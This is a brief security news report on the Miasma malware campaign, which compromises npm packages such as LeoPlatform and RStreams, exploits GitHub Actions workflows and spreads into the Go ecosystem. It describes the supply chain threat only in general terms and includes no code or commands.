Miasma Malware Targets npm Packages and GitHub Actions in Supply Chain Attack

Miasma malware has escalated its supply chain attacks by compromising new npm packages and exploiting GitHub Actions, building upon previous campaigns involving the Mini Shai-Hulud and Hades malware families. Researchers observed malicious npm releases targeting the LeoPlatform and RStreams packages, indicating a broadening scope of attack vectors. This evolution also includes the propagation of Miasma into the Go programming ecosystem, suggesting a multi-language threat landscape. The malware's methodology involves injecting malicious code into legitimate software packages, which then infects downstream users and projects that incorporate these compromised dependencies. The exploitation of GitHub Actions workflows allows attackers to potentially gain further access to CI/CD pipelines, enabling them to automate the distribution of malware or exfiltrate sensitive data. This sophisticated approach highlights the persistent and evolving nature of supply chain threats, which pose a significant risk to software development and deployment processes across the industry. The continuous adaptation of Miasma malware underscores the need for enhanced security measures and vigilant monitoring within software supply chains to detect and mitigate such advanced persistent threats.